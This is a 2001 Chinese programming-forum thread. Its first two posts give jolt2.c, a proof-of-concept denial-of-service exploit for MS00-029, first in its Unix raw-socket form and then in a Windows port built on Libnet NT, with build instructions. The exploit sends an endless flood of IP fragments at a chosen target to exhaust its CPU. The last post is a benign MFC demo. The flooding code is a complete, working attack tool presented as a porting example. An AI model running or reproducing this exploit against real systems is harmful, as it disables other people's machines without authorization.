【Visual C++】:在win平台发原始数据包实例(源程序)在win平台发原始数据包实例(源程序)
cloud (cloud) 2001-4-19 11:57:29
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
前几天受一位朋友之托,把一个程序从 Unix 移植到 Windows;源程序使用了 RAW_SOCKET,
故只能用 Libnet for NT 改写。
源程序如下(改写后的程序另附):
/*
* File: jolt2.c
* Author: Phonix
* Date: 23-May-00
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-service attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * In-memory image of the one datagram this program sends: an IP header,
 * then either an ICMP or a UDP header sharing the same storage, then a
 * single payload byte. `pkt` is the only instance; do_frags() fills it.
 * NOTE(review): no packing directive is used, so the wire layout relies on
 * the header structs needing no padding -- confirm for the compiler in use.
 */
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data; /* the single payload byte */
}
pkt;
/* Header sizes cached once, plus the raw socket descriptor shared with quit(). */
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck; /* zero until main() stores the socket() result */
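/*
 * Prints the command-line synopsis to stderr and terminates the process
 * with status 0.
 *
 * pname - program name to show in the synopsis (argv[0] at the call sites)
 *
 * The two format strings are each kept on a single line and end in a real
 * newline escape; in the listing they were wrapped mid-literal and the
 * escape had been mangled to "/n".
 */
void usage(char *pname)
{
    fprintf(stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname);
    fprintf(stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
    exit(0);
}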
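/*
 * Resolves host_name with gethostbyname() and returns the first address as
 * the raw IPv4 bytes (network byte order) stored in a u_long.
 *
 * host_name - host name or dotted-quad string
 *
 * Returns 0 when the lookup fails or when the answer is not a 4-byte
 * AF_INET address. The copy length is fixed at sizeof(struct in_addr)
 * instead of trusting the resolver-supplied h_length, so the destination
 * can never be overrun.
 */
u_long host_to_ip(char *host_name)
{
    u_long ip_bytes = 0;
    struct hostent *res;

    if (host_name == NULL)
        return 0;

    res = gethostbyname(host_name);
    if (res == NULL || res->h_addr_list == NULL || res->h_addr_list[0] == NULL)
        return 0;

    /* Only a plain IPv4 answer fits the callers' 32-bit address fields. */
    if (res->h_addrtype != AF_INET || res->h_length != (int)sizeof(struct in_addr))
        return 0;

    memcpy(&ip_bytes, res->h_addr_list[0], sizeof(struct in_addr));
    return ip_bytes;
}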
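/*
 * Reports a fatal condition and terminates the process with status -1.
 *
 * reason - text handed to perror(); perror() appends the current errno
 *          description, which may be unrelated when the caller is
 *          reporting a bad argument rather than a failed system call.
 *
 * The socket is closed only when a descriptor was actually stored in
 * spf_sck. The global is still 0 when quit() runs before socket(), and
 * closing descriptor 0 would close standard input.
 */
void quit(char *reason)
{
    perror(reason);
    if (spf_sck > 0)
        close(spf_sck);
    exit(-1);
}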
/*
 * Builds one datagram in the global pkt and sends it to dst_addr on the raw
 * socket sck in a loop that never exits.
 *
 * sck      - raw socket opened by the caller
 * src_addr - value copied into the IP source field
 * dst_addr - value copied into the IP destination field and the sendto() address
 * port     - non-zero selects a UDP header with this destination port;
 *            zero selects an ICMP echo header
 *
 * The return statement after the loop cannot be reached.
 *
 * For detection and filtering: every datagram sent is identical. It carries
 * IP id 0x455 and fragment field 8190 (0x1FFE), i.e. all three flag bits
 * clear and a 13-bit offset of 8190 eight-byte units. The file header ties
 * the resulting CPU exhaustion on the listed Windows versions to MS00-029.
 */
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x; /* never used in this function */
struct sockaddr_in to;
to.sin_family = AF_INET;
to.sin_port = 1235; /* stored without htons(), unlike the port fields below */
to.sin_addr.s_addr = dst_addr;
/* Bytes handed to sendto(): IP header + transport header + one data byte. */
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5; /* header length in 32-bit words, i.e. no IP options */
/* NOTE(review): 40 is added after htons(), so the field is not simply a network-order length. */
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455); /* constant id on every datagram */
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190); /* flags clear, fragment offset 8190 */
if (port)
{
pkt.proto.udp.source = htons(port|1235);
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9); /* 8-byte UDP header plus the one data byte */
pkt.data = 'a';
}
else
{
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0; /* left at zero; no checksum is computed */
}
/* Unbounded send loop; the sendto() result is stored but never inspected. */
while (1)
{
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
}
return bs; /* unreachable */
}
/*
 * Entry point: looks up the local host name for the source address, parses
 * -s/-p/-h, resolves the last argument as the destination, opens a raw
 * socket with IP_HDRINCL and hands over to do_frags().
 * Opening a SOCK_RAW socket normally requires elevated privileges on
 * Unix-like systems. No value is returned explicitly at the end of main.
 */
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0; /* bs doubles as the "on" value for IP_HDRINCL */
char hostname[32];
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32); /* return value not checked */
src_addr = host_to_ip(hostname); /* 0 on lookup failure; not checked here */
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
/* NOTE(review): the -s value is stored in dst_addr, which is assigned again after the loop. */
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
port = atoi(optarg); /* atoi() yields 0 for non-numeric text, which the range check rejects */
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]); /* usage() exits, so there is no fall-out from the switch */
}
}
dst_addr = host_to_ip(argv[argc-1]); /* the last argument is always taken as the destination */
if (!dst_addr)
quit("Bad destination address given.");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
/* NOTE(review): socket() reports failure as -1; this test only fires for descriptor 0. */
if (!spf_sck)
quit("socket()");
/* IP_HDRINCL: the program supplies the IP header itself. */
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port); /* does not return */
}
-----------
【Visual C++】:在win平台发原始数据包实例(改写后)在win平台发原始数据包实例(改写后)
cloud (cloud) 2001-4-19 12:01:47
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
编译前须先下载 libnet NT(ftp://202.117.82.4)。
它自带一个 tcpspoof 程序;本程序的编译参数与其一致,但需另外链接 wsock32.lib,
并添加如下定义:
/*
 * Definition the post says to add before building the libnet port.
 * NOTE(review): if the Windows socket headers in use already declare
 * struct timeval, this becomes a duplicate definition -- confirm.
 */
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* and microseconds */
};
/*
* File: jolt2.c
* Author: Phonix
* Date: 23-May-00
*
* Modified by cloud 2001-4-17
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-serice attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include
#include
#include /* for EOF */
#include /* for strchr() */
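/* Character that follows the one `string` points at (argument parenthesised). */
#define _next_char(string) ((char)(*((string) + 1)))

/* Globals exported by getopt(). */
char *optarg = NULL; /* start of the current option's argument, or NULL */
int optind = 1;      /* index of the next argv[] element to examine */
int opterr = 1;      /* non-zero: report an invalid option as '?' */

/*
 * Small getopt() replacement for toolchains that lack one.
 *
 * argc, argv - the program's argument vector
 * opstring   - accepted option letters; a letter followed by ':' takes an
 *              argument, either attached ("-p80") or in the next argv[]
 *
 * Options may start with '-' or '/'. Returns the option letter, EOF when
 * the options are exhausted (first non-option argument, "-" or "--"), and
 * for an unknown letter or a missing argument '?' when opterr is non-zero,
 * otherwise the offending character. optarg and optind are updated as a
 * side effect; scanning state is kept in a static, so the function is not
 * reentrant.
 *
 * Two fixes over the listing:
 *  - the end-of-string test uses '\0'; the listing showed the mangled
 *    constant '/0', which never matched, so a detached argument
 *    ("-p 80") was never picked up;
 *  - an empty option (a lone "/") is rejected before strchr(), which
 *    would otherwise match opstring's terminator and lead to a read past
 *    the end of opstring.
 */
int getopt(int argc, char *argv[], char *opstring)
{
    static char *pIndexPosition = NULL; /* position inside the argv string being scanned */
    char *pArgString = NULL;            /* option letter examined on this call */
    char *pOptString;                   /* match for that letter inside opstring */

    if (pIndexPosition != NULL) {
        /* The previous call stopped inside a cluster such as "-ab". */
        if (*(++pIndexPosition)) {
            pArgString = pIndexPosition;
        }
    }

    if (pArgString == NULL) {
        /* Start on a fresh argv[] element. */
        if (optind >= argc) {
            pIndexPosition = NULL;
            return EOF; /* every argument has been consumed */
        }

        pArgString = argv[optind++];

        /* The first argument not starting with '/' or '-' ends the options. */
        if (('/' != *pArgString) && ('-' != *pArgString)) {
            --optind; /* leave optind on the first non-option argument */
            optarg = NULL;
            pIndexPosition = NULL;
            return EOF;
        }

        /* "-" and "--" are explicit end-of-options markers. */
        if ((strcmp(pArgString, "-") == 0) ||
            (strcmp(pArgString, "--") == 0)) {
            optarg = NULL;
            pIndexPosition = NULL;
            return EOF;
        }

        pArgString++; /* skip the leading '/' or '-' */
    }

    if (':' == *pArgString) {
        /* A literal ':' is never a valid option letter. */
        return (opterr ? (int)'?' : (int)':');
    }
    else if (('\0' == *pArgString) ||
             ((pOptString = strchr(opstring, *pArgString)) == NULL)) {
        /* Empty or unknown option letter. */
        optarg = NULL;
        pIndexPosition = NULL;
        return (opterr ? (int)'?' : (int)*pArgString);
    }
    else {
        if (':' == _next_char(pOptString)) {
            /* The option takes an argument. */
            if ('\0' != _next_char(pArgString)) {
                optarg = &pArgString[1]; /* attached: "-p80" */
            }
            else if (optind < argc) {
                optarg = argv[optind++]; /* detached: "-p 80" */
            }
            else {
                /* The argument is missing altogether. */
                optarg = NULL;
                return (opterr ? (int)'?' : (int)*pArgString);
            }
            pIndexPosition = NULL;
        }
        else {
            /* Plain flag: remember where we are so a cluster can continue. */
            optarg = NULL;
            pIndexPosition = pArgString;
        }
        return (int)*pArgString;
    }
}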
/*
 * In-memory image of the one datagram this program builds: an IP header,
 * then either an ICMP or a UDP header sharing the same storage, then a
 * single payload byte. `pkt` is the only instance; do_frags() fills it.
 * NOTE(review): no packing directive is used, so the wire layout relies on
 * the header structs needing no padding -- confirm for the compiler in use.
 */
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data; /* the single payload byte */
}
pkt;
u_char * ppkt = (u_char *) & pkt; /* byte pointer handed to the libnet calls; starts out aliasing pkt */
int network; /* descriptor returned by libnet_open_raw_sock() in do_frags() */
/* Header sizes cached once, plus the socket descriptor left over from the Unix version. */
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck; /* never assigned anywhere in this listing */
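/*
 * Prints the command-line synopsis to stderr and terminates the process
 * with status 0.
 *
 * pname - program name to show in the synopsis (argv[0] at the call sites)
 *
 * The two format strings are each kept on a single line and end in a real
 * newline escape; in the listing they were wrapped mid-literal and the
 * escape had been mangled to "/n".
 */
void usage(char *pname)
{
    fprintf(stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", pname);
    fprintf(stderr, "Note: UDP used if a port is specified, otherwise ICMP\n");
    exit(0);
}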
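/*
 * Resolves host_name with gethostbyname() and returns the first address as
 * the raw IPv4 bytes (network byte order) stored in a u_long.
 *
 * host_name - host name or dotted-quad string
 *
 * Returns 0 when the lookup fails or when the answer is not a 4-byte
 * AF_INET address. The copy length is fixed at sizeof(struct in_addr)
 * instead of trusting the resolver-supplied h_length, so the destination
 * can never be overrun.
 */
u_long host_to_ip(char *host_name)
{
    u_long ip_bytes = 0;
    struct hostent *res;

    if (host_name == NULL)
        return 0;

    res = gethostbyname(host_name);
    if (res == NULL || res->h_addr_list == NULL || res->h_addr_list[0] == NULL)
        return 0;

    /* Only a plain IPv4 answer fits the callers' 32-bit address fields. */
    if (res->h_addrtype != AF_INET || res->h_length != (int)sizeof(struct in_addr))
        return 0;

    memcpy(&ip_bytes, res->h_addr_list[0], sizeof(struct in_addr));
    return ip_bytes;
}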
/*
 * Reports a fatal condition through perror() and ends the process with
 * status -1. The socket close and the libnet packet release of the
 * original are disabled in this port, so no cleanup happens here.
 *
 * reason - text handed to perror(), which appends the errno description
 */
void quit(char *reason)
{
    perror(reason);

    exit(-1);
}
/*
 * libnet port of the send routine: sets up a libnet packet buffer and raw
 * socket, fills the global pkt header fields, runs the libnet checksum
 * helper and then calls libnet_write_ip() in a loop that never exits.
 *
 * sck      - unused here; the sendto() call that took it is commented out
 * src_addr - value copied into the IP source field
 * dst_addr - value copied into the IP destination field
 * port     - non-zero selects a UDP header with this destination port;
 *            zero selects an ICMP echo header
 *
 * The return statement after the loop cannot be reached, and bs is never
 * assigned in this version.
 *
 * For detection and filtering: the header fields written below are the
 * same on every iteration -- IP id 0x455 and fragment field 8190 (0x1FFE),
 * i.e. all three flag bits clear and a 13-bit offset of 8190 eight-byte
 * units. The file header ties the effect to MS00-029.
 *
 * NOTE(review): the "/n" at the end of the message strings looks like a
 * mangled newline escape -- confirm against the author's original.
 */
int do_frags (int sck, u_long src_addr, u_long dst_addr, u_short
port)
{
int bs, psize;
// unsigned long x;
struct sockaddr_in to; /* filled in below but no longer passed to any call */
/* Byte count given to libnet: IP header + transport header + one data byte. */
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
libnet_init_packet (psize, &ppkt);
if (ppkt == NULL)
{
libnet_error (LIBNET_ERR_FATAL, "Failed./n");
}
network = libnet_open_raw_sock (IPPROTO_RAW);
if (network == -1)
{
libnet_error (LIBNET_ERR_FATAL, "Cannot open network./n");
}
to.sin_family = AF_INET;
to.sin_port = 1235; /* stored without htons() */
to.sin_addr.s_addr = dst_addr;
memset(&pkt, 0, psize);
pkt.ip.ip_v = 4;
pkt.ip.ip_hl = 5; /* header length in 32-bit words, i.e. no IP options */
/* NOTE(review): 40 is added after htons(), so the field is not simply a network-order length. */
pkt.ip.ip_len = htons((u_short) (iplen + icmplen )) + 40;
pkt.ip.ip_id = htons(0x455); /* constant id */
pkt.ip.ip_ttl = 255;
pkt.ip.ip_p = (port ? IPPROTO_UDP : IPPROTO_ICMP);
memcpy(&pkt.ip.ip_src , &src_addr,sizeof(struct in_addr));
memcpy(&pkt.ip.ip_dst , &dst_addr, sizeof(struct in_addr));
pkt.ip.ip_off = htons (8190); /* flags clear, fragment offset 8190 */
if (port)
{
pkt.proto.udp.source = htons( (u_short) (port | 1235 ));
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9); /* 8-byte UDP header plus the one data byte */
pkt.data = 'a';
if (libnet_do_checksum (ppkt, IPPROTO_UDP, LIBNET_UDP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, "checksum failed/n");
}
}
else
{
pkt.proto.icmp.icmp_type = ICMP_ECHO;
pkt.proto.icmp.icmp_code = 0;
pkt.proto.icmp.icmp_cksum = 0;
/* A checksum failure is only reported here; execution continues. */
if (libnet_do_checksum(ppkt, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H)
== -1)
{
fprintf(stderr, "Can't do checksum!/n");
}
}
/* Unbounded write loop; the libnet_write_ip() result is not inspected. */
while (1)
{
// bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
// sizeof(struct sockaddr));
libnet_write_ip (network, ppkt, psize);
}
return bs; /* unreachable */
}
/*
 * Entry point of the libnet port: initialises libnet for Win32, looks up
 * the local host name for the source address, parses -s/-p/-h, resolves
 * the last argument as the destination and calls do_frags().
 * The socket()/setsockopt() calls of the Unix version are commented out;
 * do_frags() opens its raw socket through libnet instead.
 * No value is returned explicitly at the end of main.
 */
int main(int argc, char *argv[])
{
// int packet_size;
u_long src_addr, dst_addr;
int i, bs=1; /* bs is unused now that setsockopt() is commented out */
u_short port=0;
char hostname[32];
libnet_win32_init(1); /* presumably starts Winsock for libnet -- confirm against libnet NT */
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32); /* return value not checked */
src_addr = host_to_ip(hostname); /* 0 on lookup failure; not checked here */
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
/* NOTE(review): the -s value is stored in dst_addr, which is assigned again after the loop. */
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
/* NOTE(review): port is u_short, so the atoi() result is truncated before the range test;
   "> 65535" can never be true and "<= 0" only catches a value that truncates to 0. */
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]); /* usage() exits, so there is no fall-out from the switch */
}
}
dst_addr = host_to_ip(argv[argc-1]); /* the last argument is always taken as the destination */
if (!dst_addr)
quit("Bad destination address given.");
//spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
/* Tests the global spf_sck, which this listing never assigns. */
if (!spf_sck)
quit("socket()");
// if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
// sizeof(bs)) < 0)
// quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port); /* contains an endless loop */
libnet_destroy_packet (&ppkt); /* only reached if do_frags() were to return */
}
-----------
无 云
【Visual C++】:脱离AppWizard和ClassWizard使用MFC脱离AppWizard和ClassWizard使用MFC
cloud (cloud) 2001-2-18 13:27:55
开放实验室 (openlab.nwpu.edu.cn) 【Visual C++】专栏
如果不喜欢 AppWizard 和 ClassWizard 产生的大量无用代码,
我们可以脱离它们,使用文本编辑器来创建我们的程序。
一个小小的演示:stand.cpp
#define _AFXDLL
#define WIN32
//#define _UNICODE
#include<afxwin.h>
// Application class: its only override creates and shows the main window.
class CMyApp : public CWinApp
{
public :
virtual BOOL InitInstance(); // start-up hook; creates the frame window
};
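// Main frame window: owns the menu bar, one popup menu and one push button,
// and handles keyboard input, painting and the three commands below.
// Every trailing comment now stays on its own line; in the listing one of
// them had wrapped onto a line of its own and broke the class body.
class CMyFrame : public CFrameWnd
{
// Command identifiers routed through the message map.
#define ID_NEW_MENUITEM 1004   // menu item handled by OnNewMenuItem
#define ID_EXIT_MENUITEM 1005  // menu item handled by OnExitMenuItem
#define ID_BUTTON 1006         // push button handled by OnButton
private:
    CMenu MainMenu;    // menu bar
    CMenu FileMenu;    // popup holding the two menu items
    CButton MyButton;
public:
    CMyFrame();        // creates the window
protected:
    afx_msg void OnChar(UINT nChar, UINT nRepCnt, UINT nFlags); // keyboard input
    afx_msg void OnPaint();                                     // draws the typed text
    afx_msg int OnCreate(LPCREATESTRUCT lpCS);                  // builds the menu and the button
    virtual BOOL PreCreateWindow(CREATESTRUCT & cs);            // registers the window class
    void OnExitMenuItem(); // command handler for ID_EXIT_MENUITEM
    void OnNewMenuItem();  // command handler for ID_NEW_MENUITEM
    void OnButton();       // command handler for ID_BUTTON
    DECLARE_MESSAGE_MAP()
};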
CString str; // text typed into the window so far; appended in OnChar, drawn in OnPaint
CMyApp theApp; // the single application object
// Application start-up: creates the frame window, registers it as the main
// window, then shows it and forces a first paint. Always reports success.
BOOL CMyApp::InitInstance()
{
    CMyFrame* frame = new CMyFrame();
    m_pMainWnd = frame;

    frame->ShowWindow(m_nCmdShow);
    frame->Invalidate();
    frame->UpdateWindow();

    return TRUE;
}
// Message map: routes paint, character and create messages plus the three
// command identifiers to the CMyFrame handlers.
BEGIN_MESSAGE_MAP(CMyFrame,CFrameWnd)
ON_WM_PAINT()
ON_WM_CHAR()
ON_WM_CREATE()
ON_COMMAND(ID_NEW_MENUITEM,OnNewMenuItem)
ON_COMMAND(ID_EXIT_MENUITEM,OnExitMenuItem)
ON_COMMAND(ID_BUTTON,OnButton)
END_MESSAGE_MAP()
// Constructor: creates the frame window titled "Test" at a fixed position.
// The result of Create() is not inspected.
CMyFrame::CMyFrame()
{
    const CRect initialBounds(100, 100, 500, 300);
    Create(NULL, _T("Test"), WS_TILEDWINDOW, initialBounds);
}
// WM_PAINT handler: draws the global text buffer `str` into the client
// area, anchored top-left.
void CMyFrame::OnPaint()
{
    CPaintDC paintDc(this);

    CRect clientArea;
    GetClientRect(&clientArea);

    paintDc.DrawText(str, &clientArea, DT_TOP | DT_LEFT);
}
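// WM_CHAR handler: records keystrokes in the global buffer `str`.
// Backspace removes the last character, anything else is appended, the
// window is repainted, and WM_QUIT is posted once the text ends in "exit"
// followed by Enter.
//
// nChar    - character code of the key
// nRepCnt  - repeat count (not used)
// nFlags   - key flags (not used)
//
// The escapes '\b' and '\r' are restored; in the listing they had been
// mangled to "/b" and "/r", which made the six-character literal unable to
// equal Right(5). `str` is never trimmed, so it grows for as long as the
// user keeps typing.
void CMyFrame::OnChar(UINT nChar, UINT nRepCnt, UINT nFlags)
{
    switch (nChar)
    {
    case _T('\b'):
        // Nothing to delete when the buffer is already empty.
        if (!str.IsEmpty())
            str.Delete(str.GetLength() - 1);
        break;
    default:
        // Explicit narrowing selects the single-character append.
        str += static_cast<TCHAR>(nChar);
    }
    Invalidate();
    // Enter arrives as '\r'; "exit\r" is exactly five characters.
    if (str.Right(5) == _T("exit\r"))
        PostQuitMessage(0);
}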
// Registers a window class with the arrow cursor and the standard window
// background, stores its name in the create structure, then lets the base
// class finish.
BOOL CMyFrame::PreCreateWindow(CREATESTRUCT & cs)
{
    HCURSOR arrowCursor = LoadCursor(NULL, IDC_ARROW);
    HBRUSH windowBrush = HBRUSH(COLOR_WINDOW+1);

    cs.lpszClass = AfxRegisterWndClass(NULL, arrowCursor, windowBrush, NULL);

    return CFrameWnd::PreCreateWindow(cs);
}
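// WM_CREATE handler: builds the menu bar with one popup of two items,
// attaches it to the frame and creates the push button. Returns 0 so that
// window creation continues.
//
// Changes over the listing: the menu captions use _T() like the rest of
// the file instead of a C-style cast to LPCTSTR (the cast would hand a
// narrow string to a wide-character API if _UNICODE were enabled), the
// caption that had been wrapped mid-literal is one literal again, and the
// popup handle is passed as UINT_PTR so it is not truncated on a 64-bit
// build.
// NOTE(review): CFrameWnd::OnCreate is not called -- confirm that skipping
// the base-class handler is intended.
int CMyFrame::OnCreate(LPCREATESTRUCT lpCreateStruct)
{
    MainMenu.CreateMenu();
    FileMenu.CreatePopupMenu();
    FileMenu.AppendMenu(MF_STRING, ID_NEW_MENUITEM, _T("开始"));
    FileMenu.AppendMenu(MF_STRING, ID_EXIT_MENUITEM, _T("退出"));
    MainMenu.AppendMenu(MF_POPUP, reinterpret_cast<UINT_PTR>(FileMenu.m_hMenu), _T("文件"));
    SetMenu(&MainMenu);
    MyButton.Create(_T("My button"), WS_CHILD | WS_VISIBLE,
                    CRect(10, 70, 100, 100), this, ID_BUTTON);
    return 0;
}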
// Command handler for ID_EXIT_MENUITEM: posts WM_QUIT to end the message loop.
void CMyFrame::OnExitMenuItem()
{
PostQuitMessage(0);
}
// Command handler for ID_NEW_MENUITEM: shows a confirmation message box.
void CMyFrame::OnNewMenuItem()
{
AfxMessageBox(_T("New MenuItem Clicked !") );
}
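// Command handler for ID_BUTTON: shows a confirmation message box.
// The caption is wrapped in _T() like the one in OnNewMenuItem, so the
// handler also builds when _UNICODE is defined.
void CMyFrame::OnButton()
{
    AfxMessageBox(_T("Button Clicked !"));
}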
编译方法:
cl stand.cpp /MD /c
link stand.obj /subsystem:windows
※编辑: cloud 于 2001-2-18 13:31:53 在 [202.117.82.4] 编辑本文
-----------
无 云